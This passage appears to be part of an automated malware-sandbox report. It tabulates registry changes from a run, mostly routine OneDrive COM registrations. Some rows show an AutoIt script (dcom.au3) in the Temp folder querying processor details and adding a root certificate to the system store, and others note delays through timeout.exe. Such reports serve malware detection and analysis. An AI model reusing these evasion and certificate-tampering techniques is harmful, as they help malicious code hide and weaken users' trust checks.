| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\CLSID\{5AB7172C-9C11-405C-8DD5-AF20F3606282}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\21.220.1024.0005\\amd64\\FileSyncShell64.dll" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\CLSID\{A78ED123-AB77-406B-9962-2A5D9D2F7F30}\InprocServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{94269C4E-071A-4116-90E6-52E557067E4E}\LocalServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\18.151.0729.0013\\FileCoAuth.exe" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{2e7c0a19-0438-41e9-81e3-3ad3d64f55ba}\LocalServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{94269C4E-071A-4116-90E6-52E557067E4E}\LocalServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}\InProcServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\21.220.1024.0005\\amd64\\FileSyncShell64.dll" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\21.220.1024.0005\\FileCoAuthLib.dll" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\CLSID\{9489FEB2-1925-4D01-B788-6D912C70F7F2}\LocalServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\18.151.0729.0013\\FileCoAuth.exe" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{1BF42E4C-4AF4-4CFD-A1A0-CF2960B8F63E}\InprocServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\dcom.au3 | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\OneDrive.exe = "11000" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\OneDrive.exe = "11000" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Software\Microsoft\Internet Explorer\IESettingSync | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\OneDrive.exe = "11000" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\Interface\{F0AF7C30-EAE4-4644-961D-54E6E28708D6}\TypeLib\ = "{909A6CCD-6810-46C4-89DF-05BE7EB61E6C}" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Interface\{e9de26a1-51b2-47b4-b1bf-c87059cc02a7}\TypeLib\Version = "1.0" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Interface\{EA23A664-A558-4548-A8FE-A6B94D37C3CF}\ProxyStubClsid32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_CLASSES\INTERFACE\{1EDD003E-C446-43C5-8BA0-3778CC4792CC}\TYPELIB | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Interface\{0d4e4444-cb20-4c2b-b8b2-94e5656ecae8}\TypeLib | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\Interface\{C2FE84F5-E036-4A07-950C-9BFD3EAB983A}\TypeLib | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\TypeLib\{638805C3-4BA3-4AC8-8AAC-71A0BA2BC284}\1.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\18.151.0729.0013\\FileCoAuth.exe\\1" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\Interface\{0776ae27-5ab9-4e18-9063-1836da63117a}\TypeLib\ = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Interface\{02C98E2C-6C9F-49F8-9B57-3A6E1AA09A67}\ = "ISyncInformationLookupCallback" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\Interface\{e9de26a1-51b2-47b4-b1bf-c87059cc02a7}\TypeLib\ = "{909A6CCD-6810-46C4-89DF-05BE7EB61E6C}" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Interface\{390AF5A7-1390-4255-9BC9-935BFCFA5D57}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Interface\{B05D37A9-03A2-45CF-8850-F660DF0CBF07}\ = "IOneDriveInfoProvider" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Interface\{D0ED5C72-6197-4AAD-9B16-53FE461DD85C}\TypeLib | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{A78ED123-AB77-406B-9962-2A5D9D2F7F30} | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\CLSID\{20894375-46AE-46E2-BAFD-CB38975CDCE6}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Interface\{F062BA81-ADFE-4A92-886A-23FD851D6406}\TypeLib\Version = "1.0" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\BannerNotificationHandler.BannerNotificationHandler\CurVer | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Interface\{B54E7079-90C9-4C62-A6B8-B2834C33A04A}\ProxyStubClsid32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Interface\{466F31F7-9892-477E-B189-FA5C59DE3603}\TypeLib\ = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\NucleusNativeMessaging.NucleusNativeMessaging\ = "NucleusNativeMessaging Class" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\odopen\shell | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\SyncEngineStorageProviderHandlerProxy.SyncEngineStorageProviderHandlerProxy.1\CLSID | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{6bb93b4e-44d8-40e2-bd97-42dbcf18a40f}\ = "ToastActivator Class" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\Interface\{466F31F7-9892-477E-B189-FA5C59DE3603}\TypeLib\ = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\ProgID | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Interface\{F0AF7C30-EAE4-4644-961D-54E6E28708D6} | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Interface\{22A68885-0FD9-42F6-9DED-4FB174DC7344}\TypeLib\ = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\Interface\{9E1CD0DF-72E7-4284-9598-342C0A46F96B} | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\Interface\{1B71F23B-E61F-45C9-83BA-235D55F50CF9}\TypeLib\Version = "1.0" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{9AA2F32D-362A-42D9-9328-24A483E2CCC3}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Interface\{AF60000F-661D-472A-9588-F062F6DB7A0E}\ProxyStubClsid32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{7AFDFDDB-F914-11E4-8377-6C3BE50D980C}\InprocServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\Interface\{1EDD003E-C446-43C5-8BA0-3778CC4792CC}\TypeLib\Version = "1.0" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\Interface\{31508CC7-9BC7-494B-9D0F-7B1C7F144182}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\Interface\{79A2A54C-3916-41FD-9FAB-F26ED0BBA755} | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\FileSyncClient.AutoPlayHandler\shell\import\DropTarget | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\Interface\{0299ECA9-80B6-43C8-A79A-FB1C5F19E7D8}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\Interface\{5D5DD08F-A10E-4FEF-BCA7-E73E666FC66C}\TypeLib\Version = "1.0" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\Interface\{049FED7E-C3EA-4B66-9D92-10E8085D60FB}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Interface\{EA23A664-A558-4548-A8FE-A6B94D37C3CF} | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\Interface\{2692D1F2-2C7C-4AE0-8E73-8F37736C912D} | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Interface\{2EB31403-EBE0-41EA-AE91-A1953104EA55}\TypeLib | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Interface\{B05D37A9-03A2-45CF-8850-F660DF0CBF07} | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\Interface\{0f872661-c863-47a4-863f-c065c182858a} | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\Interface\{3A4E62AE-45D9-41D5-85F5-A45B77AB44E5} | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Interface\{2692D1F2-2C7C-4AE0-8E73-8F37736C912D} | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\Interface\{1EDD003E-C446-43C5-8BA0-3778CC4792CC}\ProxyStubClsid32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\Interface\{31508CC7-9BC7-494B-9D0F-7B1C7F144182}\ProxyStubClsid32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\FileSyncClient.FileSyncClient\CLSID | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Interface\{8D3F8F15-1DE1-4662-BF93-762EABE988B2}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\Interface\{944903E8-B03F-43A0-8341-872200D2DA9C}\TypeLib\Version = "1.0" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Interface\{385ED83D-B50C-4580-B2C3-9E64DBE7F511}\TypeLib | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_CLASSES\TYPELIB\{4B1C80DA-FA45-468F-B42B-46496BDBE0C5}\1.0\0\WIN32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}\InprocServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\ShellFolder\FolderValueFlags = "40" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\FileSyncConfig.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\CLSID\{9489FEB2-1925-4D01-B788-6D912C70F7F2}\ProgID\ = "StorageProviderUriSource.StorageProviderUriSource.1" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Interface\{3A4E62AE-45D9-41D5-85F5-A45B77AB44E5}\ProxyStubClsid32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\Interface\{22A68885-0FD9-42F6-9DED-4FB174DC7344}\ProxyStubClsid32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\TypeLib | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{389510b7-9e58-40d7-98bf-60b911cb0ea9}\VersionIndependentProgID | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\Interface\{e9de26a1-51b2-47b4-b1bf-c87059cc02a7}\TypeLib | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Interface\{ACDB5DB0-C9D5-461C-BAAA-5DCE0B980E40}\ProxyStubClsid32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Interface\{2F12C599-7AA5-407A-B898-09E6E4ED2D1E} | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{6bb93b4e-44d8-40e2-bd97-42dbcf18a40f}\LocalServer32\ = "\"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /cci" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\dcom.au3 | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1